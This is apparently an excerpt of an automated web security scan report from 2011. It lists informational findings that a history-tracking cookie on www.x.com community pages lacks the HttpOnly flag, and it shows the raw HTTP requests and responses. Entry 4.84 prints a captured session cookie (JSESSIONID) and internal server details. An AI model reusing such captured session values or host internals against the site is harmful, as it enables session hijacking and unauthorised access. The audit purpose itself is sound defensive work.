Set-Cookie: jive.recentHistory.-1=31342c323034383b31342c323035313b31342c323131323b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:39 GMT; Path=/
Vary: User-Agent
JP: D=155072 t=1313157039623431
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.68. https://www.x.com/community/ppx/xspaces/finance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/finance

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/finance HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034393b31342c323131323b31342c323034383b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:40 GMT; Path=/
Vary: User-Agent
JP: D=82568 t=1313157040529050
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.69. https://www.x.com/community/ppx/xspaces/forums  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/forums

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/forums HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:52 GMT; Path=/
Vary: User-Agent
JP: D=123822 t=1313157052865732
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.70. https://www.x.com/community/ppx/xspaces/gaming  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/gaming

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/gaming HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:46 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035303b31342c323036313b31342c323035373b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b31342c323034383b31342c323131323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:46 GMT; Path=/
Vary: User-Agent
JP: D=82477 t=1313157046859519
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.71. https://www.x.com/community/ppx/xspaces/identity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/identity

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/identity HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:41 GMT; Path=/
Vary: User-Agent
JP: D=98694 t=1313157041495583
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.72. https://www.x.com/community/ppx/xspaces/innovate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/innovate

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/innovate HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:49 GMT; Path=/
Vary: User-Agent
JP: D=172927 t=1313157048855371
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.73. https://www.x.com/community/ppx/xspaces/introduce  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/introduce

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/introduce?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b31342c323236383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:52 GMT; Path=/
Vary: User-Agent
JP: D=99978 t=1313157052571521
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.74. https://www.x.com/community/ppx/xspaces/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/mobile HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035313b31342c323030393b31342c323030333b31342c323031313b31342c323030373b31342c323031343b31342c323030383b31342c323031303b31342c323031393b31342c323237363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:35 GMT; Path=/
Vary: User-Agent
JP: D=93891 t=1313157035030578
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.75. https://www.x.com/community/ppx/xspaces/mobile/mecl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile/mecl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/mobile/mecl HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236363b31342c323035343b31342c323232343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:44 GMT; Path=/
Vary: User-Agent
JP: D=118072 t=1313157044365221
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.76. https://www.x.com/community/ppx/xspaces/mobile/mobile_ec  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile/mobile_ec

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/mobile/mobile_ec HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232343b31342c323236363b31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:44 GMT; Path=/
Vary: User-Agent
JP: D=244511 t=1313157043858374
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.77. https://www.x.com/community/ppx/xspaces/security  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/security

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/security HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:55 GMT; Path=/
Vary: User-Agent
JP: D=117938 t=1313157055856107
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.78. https://www.x.com/community/ppx/xspaces/social  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/social

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/social HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035323b31342c323035303b31342c323036313b31342c323035373b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b31342c323034383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:47 GMT; Path=/
Vary: User-Agent
JP: D=146095 t=1313157047611313
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.79. https://www.x.com/community/ppx/xspaces/subscriptions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/subscriptions

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/subscriptions HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232313b31342c323130303b31342c323036333b31342c323038343b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:54 GMT; Path=/
Vary: User-Agent
JP: D=123225 t=1313157053998686
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.80. https://www.x.com/community/ppx/xspaces/toolkits  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/toolkits

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/toolkits HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323235313b31342c323232313b31342c323038343b31342c323130303b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:54 GMT; Path=/
Vary: User-Agent
JP: D=92295 t=1313157054626427
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.81. https://www.x.com/community/ppx/xspaces/web_checkout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/web_checkout HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:43 GMT; Path=/
Vary: User-Agent
JP: D=247512 t=1313157042801714
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.82. https://www.x.com/community/ppx/xspaces/web_checkout/nvp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout/nvp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/web_checkout/nvp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035373b31342c323236363b31342c323035343b31342c323232343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:45 GMT; Path=/
Vary: User-Agent
JP: D=141801 t=1313157044894483
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.83. https://www.x.com/community/ppx/xspaces/web_checkout/soap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout/soap

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/web_checkout/soap HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:46 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036313b31342c323035373b31342c323232343b31342c323236363b31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:46 GMT; Path=/
Vary: User-Agent
JP: D=130212 t=1313157046417943
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.84. https://www.x.com/community/xcommerce-blogs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs?view=blog HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/index.jspa
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237363b31342c323030383b; Expires=Sun, 11-Sep-2011 13:38:43 GMT; Path=/
Vary: User-Agent
JP: D=97775 t=1313156323515835
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.85. https://www.x.com/community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323232363b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c353939353b33382c363039373b33382c363233383b33382c363238353b33382c363030363b33382c363133383b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:28 GMT; Path=/
Vary: User-Agent
JP: D=114399 t=1313157088244606
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.86. https://www.x.com/community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323232363b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363030363b33382c363233383b33382c363039373b33382c363133383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:27 GMT; Path=/
Vary: User-Agent
JP: D=132206 t=1313157087884897
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

